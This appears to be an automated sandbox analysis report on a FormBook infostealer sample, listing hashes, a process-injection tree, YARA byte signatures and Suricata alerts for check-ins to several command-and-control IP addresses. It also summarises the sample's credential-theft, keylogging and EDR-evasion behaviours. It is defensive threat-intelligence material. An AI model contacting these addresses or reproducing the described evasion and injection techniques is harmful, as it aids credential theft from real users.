Windows Analysis Report
jpdy1E8K4A.exe

Overview

General Information

Sample name: jpdy1E8K4A.exe
renamed because original name is a hash value
Original sample name: 64cccb8039b0fa277f21e1dccbeec520d08d2606dac35912b147372c03e53f56.exe
Analysis ID: 1529045
MD5: 473df0a675ceaba5a7c27f100e7d7491
SHA1: a3f60109a59e91a0e6443367b42a0ee8fd3feae6
SHA256: 64cccb8039b0fa277f21e1dccbeec520d08d2606dac35912b147372c03e53f56
Tags: exe, Formbook, user-adrian__luca

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • jpdy1E8K4A.exe (PID: 3992 cmdline: "C:\Users\user\Desktop\jpdy1E8K4A.exe" MD5: 473DF0A675CEABA5A7C27F100E7D7491)
    • svchost.exe (PID: 6412 cmdline: "C:\Users\user\Desktop\jpdy1E8K4A.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • URUrIrqwFu.exe (PID: 2356 cmdline: "C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • netbtugc.exe (PID: 2732 cmdline: "C:\Windows\SysWOW64\netbtugc.exe" MD5: EE7BBA75B36D54F9E420EB6EE960D146)
          • firefox.exe (PID: 3060 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000002.00000002.2356846252.0000000000400000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000002.00000002.2356846252.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2ed63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x16f92:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000005.00000002.3983803562.0000000003360000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000005.00000002.3983803562.0000000003360000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2bd00:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13f2f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000005.00000002.3981537741.0000000002D40000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

Source | Rule | Description | Author | Strings
2.2.svchost.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
2.2.svchost.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2df63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x16192:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
2.2.svchost.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
2.2.svchost.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2ed63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x16f92:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Users\user\Desktop\jpdy1E8K4A.exe", CommandLine: "C:\Users\user\Desktop\jpdy1E8K4A.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\jpdy1E8K4A.exe", ParentImage: C:\Users\user\Desktop\jpdy1E8K4A.exe, ParentProcessId: 3992, ParentProcessName: jpdy1E8K4A.exe, ProcessCommandLine: "C:\Users\user\Desktop\jpdy1E8K4A.exe", ProcessId: 6412, ProcessName: svchost.exe
Source: Process started | Author: vburov | Data: Command: "C:\Users\user\Desktop\jpdy1E8K4A.exe", CommandLine: "C:\Users\user\Desktop\jpdy1E8K4A.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\jpdy1E8K4A.exe", ParentImage: C:\Users\user\Desktop\jpdy1E8K4A.exe, ParentProcessId: 3992, ParentProcessName: jpdy1E8K4A.exe, ProcessCommandLine: "C:\Users\user\Desktop\jpdy1E8K4A.exe", ProcessId: 6412, ProcessName: svchost.exe

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-08T15:52:31.520083+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50032 | 85.159.66.93 | 80 | TCP
2024-10-08T15:53:20.979467+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49932 | 148.72.152.174 | 80 | TCP
2024-10-08T15:53:45.164677+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49988 | 3.33.130.190 | 80 | TCP
2024-10-08T15:53:58.879263+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49994 | 172.191.244.62 | 80 | TCP
2024-10-08T15:54:12.891516+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49998 | 172.96.191.39 | 80 | TCP
2024-10-08T15:54:26.225019+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50003 | 217.70.184.50 | 80 | TCP
2024-10-08T15:54:39.788673+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50007 | 63.250.47.40 | 80 | TCP
2024-10-08T15:54:53.318568+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50011 | 91.184.0.200 | 80 | TCP
2024-10-08T15:55:06.485146+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50015 | 13.248.169.48 | 80 | TCP
2024-10-08T15:55:34.514487+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50024 | 43.242.202.169 | 80 | TCP
2024-10-08T15:55:49.396086+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50028 | 103.224.182.242 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-08T15:52:31.520083+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 50032 | 85.159.66.93 | 80 | TCP
2024-10-08T15:53:20.979467+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 49932 | 148.72.152.174 | 80 | TCP
2024-10-08T15:53:45.164677+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 49988 | 3.33.130.190 | 80 | TCP
2024-10-08T15:53:58.879263+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 49994 | 172.191.244.62 | 80 | TCP
2024-10-08T15:54:12.891516+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 49998 | 172.96.191.39 | 80 | TCP
2024-10-08T15:54:26.225019+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 50003 | 217.70.184.50 | 80 | TCP
2024-10-08T15:54:39.788673+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 50007 | 63.250.47.40 | 80 | TCP
2024-10-08T15:54:53.318568+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 50011 | 91.184.0.200 | 80 | TCP
2024-10-08T15:55:06.485146+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 50015 | 13.248.169.48 | 80 | TCP
2024-10-08T15:55:34.514487+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 50024 | 43.242.202.169 | 80 | TCP
2024-10-08T15:55:49.396086+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 50028 | 103.224.182.242 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-08T15:53:36.628566+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49985 | 3.33.130.190 | 80 | TCP
2024-10-08T15:53:40.009901+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49986 | 3.33.130.190 | 80 | TCP
2024-10-08T15:53:41.676273+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49987 | 3.33.130.190 | 80 | TCP
2024-10-08T15:53:51.144200+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49990 | 172.191.244.62 | 80 | TCP
2024-10-08T15:53:53.660198+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49992 | 172.191.244.62 | 80 | TCP
2024-10-08T15:53:56.364368+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49993 | 172.191.244.62 | 80 | TCP
2024-10-08T15:54:05.215147+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49995 | 172.96.191.39 | 80 | TCP
2024-10-08T15:54:07.888162+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49996 | 172.96.191.39 | 80 | TCP
2024-10-08T15:54:10.367641+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49997 | 172.96.191.39 | 80 | TCP
2024-10-08T15:54:18.612381+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49999 | 217.70.184.50 | 80 | TCP
2024-10-08T15:54:21.136113+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50001 | 217.70.184.50 | 80 | TCP
2024-10-08T15:54:23.693625+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50002 | 217.70.184.50 | 80 | TCP
2024-10-08T15:54:32.059634+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50004 | 63.250.47.40 | 80 | TCP
2024-10-08T15:54:34.593707+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50005 | 63.250.47.40 | 80 | TCP
2024-10-08T15:54:37.140940+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50006 | 63.250.47.40 | 80 | TCP
2024-10-08T15:54:45.464154+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50008 | 91.184.0.200 | 80 | TCP
2024-10-08T15:54:47.997439+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50009 | 91.184.0.200 | 80 | TCP
2024-10-08T15:54:50.681531+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50010 | 91.184.0.200 | 80 | TCP
2024-10-08T15:54:58.830090+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50012 | 13.248.169.48 | 80 | TCP
2024-10-08T15:55:01.380573+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50013 | 13.248.169.48 | 80 | TCP
2024-10-08T15:55:04.112030+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50014 | 13.248.169.48 | 80 | TCP
2024-10-08T15:55:26.847034+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50021 | 43.242.202.169 | 80 | TCP
2024-10-08T15:55:29.531562+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50022 | 43.242.202.169 | 80 | TCP
2024-10-08T15:55:32.142489+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50023 | 43.242.202.169 | 80 | TCP
2024-10-08T15:55:40.590660+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50025 | 103.224.182.242 | 80 | TCP
2024-10-08T15:55:44.298531+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50026 | 103.224.182.242 | 80 | TCP
2024-10-08T15:55:46.851792+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50027 | 103.224.182.242 | 80 | TCP
2024-10-08T15:55:56.301612+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50029 | 85.159.66.93 | 80 | TCP
2024-10-08T15:55:59.785995+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50030 | 85.159.66.93 | 80 | TCP
2024-10-08T15:56:02.332989+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50031 | 85.159.66.93 | 80 | TCP

AV Detection

Source: jpdy1E8K4A.exe | ReversingLabs: Detection: 71%
Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000002.2356846252.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.3983803562.0000000003360000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.3981537741.0000000002D40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.3984182354.00000000040E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.3983690192.0000000003310000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2361090040.0000000007C30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2357806281.0000000005B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.3991557809.0000000007130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: jpdy1E8K4A.exe | Joe Sandbox ML: detected
Source: jpdy1E8K4A.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb | source: URUrIrqwFu.exe, 00000003.00000000.2269264068.000000000049E000.00000002.00000001.01000000.00000004.sdmp
Source: Binary string: wntdll.pdbUGP | source: jpdy1E8K4A.exe, 00000000.00000003.2138350351.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, jpdy1E8K4A.exe, 00000000.00000003.2140523388.0000000004500000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2253165221.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2357316364.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2357316364.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2254958069.0000000003800000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.3984325140.0000000003740000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000003.2359616832.000000000358E000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000003.2357155798.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.3984325140.00000000038DE000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb | source: jpdy1E8K4A.exe, 00000000.00000003.2138350351.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, jpdy1E8K4A.exe, 00000000.00000003.2140523388.0000000004500000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2253165221.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2357316364.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2357316364.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2254958069.0000000003800000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, netbtugc.exe, 00000005.00000002.3984325140.0000000003740000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000003.2359616832.000000000358E000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000003.2357155798.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.3984325140.00000000038DE000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: netbtugc.pdb | source: svchost.exe, 00000002.00000002.2357173939.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2325952923.000000000341A000.00000004.00000020.00020000.00000000.sdmp, URUrIrqwFu.exe, 00000003.00000003.2301762796.000000000076B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: svchost.pdb | source: URUrIrqwFu.exe, 00000003.00000002.3989981117.0000000004CFC000.00000004.80000000.00040000.00000000.sdmp, netbtugc.exe, 00000005.00000002.3982015331.000000000311E000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.3985399158.0000000003D6C000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2758378598.000000001F2CC000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: svchost.pdbUGP | source: URUrIrqwFu.exe, 00000003.00000002.3989981117.0000000004CFC000.00000004.80000000.00040000.00000000.sdmp, netbtugc.exe, 00000005.00000002.3982015331.000000000311E000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.3985399158.0000000003D6C000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2758378598.000000001F2CC000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: netbtugc.pdbGCTL | source: svchost.exe, 00000002.00000002.2357173939.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2325952923.000000000341A000.00000004.00000020.00020000.00000000.sdmp, URUrIrqwFu.exe, 00000003.00000003.2301762796.000000000076B000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe | Code function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose, | 0_2_00452492
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe | Code function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, | 0_2_00442886
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe | Code function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, | 0_2_004788BD
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe | Code function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose, | 0_2_004339B6
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe | Code function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose, | 0_2_0045CAFA
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe | Code function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, | 0_2_00431A86
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe | Code function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose, | 0_2_0044BD27
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe | Code function: 0_2_0045DE8F FindFirstFileW,FindClose, | 0_2_0045DE8F
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe | Code function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose, | 0_2_0044BF8B
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_02D5C2C0 FindFirstFileW,FindNextFileW,FindClose, | 5_2_02D5C2C0
Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe | Code function: 4x nop then xor eax, eax | 3_2_0714EF2F
Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe | Code function: 4x nop then pop edi | 3_2_0714A773
Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe | Code function: 4x nop then pop edi | 3_2_0714A7AC
Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe | Code function: 4x nop then pop edi | 3_2_0714BA75
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4x nop then xor eax, eax | 5_2_02D49B90
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4x nop then pop edi | 5_2_02D62399
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4x nop then mov ebx, 00000004h | 5_2_035804DE

Networking

            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49932 -> 148.72.152.174:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49932 -> 148.72.152.174:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49995 -> 172.96.191.39:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49985 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50004 -> 63.250.47.40:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49999 -> 217.70.184.50:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50008 -> 91.184.0.200:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50003 -> 217.70.184.50:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49994 -> 172.191.244.62:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50003 -> 217.70.184.50:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49994 -> 172.191.244.62:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50024 -> 43.242.202.169:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50024 -> 43.242.202.169:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50031 -> 85.159.66.93:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49986 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50011 -> 91.184.0.200:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50011 -> 91.184.0.200:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50013 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50009 -> 91.184.0.200:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50026 -> 103.224.182.242:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50015 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49987 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50007 -> 63.250.47.40:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50007 -> 63.250.47.40:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50015 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49993 -> 172.191.244.62:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50014 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49990 -> 172.191.244.62:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50005 -> 63.250.47.40:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50021 -> 43.242.202.169:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50010 -> 91.184.0.200:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50027 -> 103.224.182.242:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49992 -> 172.191.244.62:80
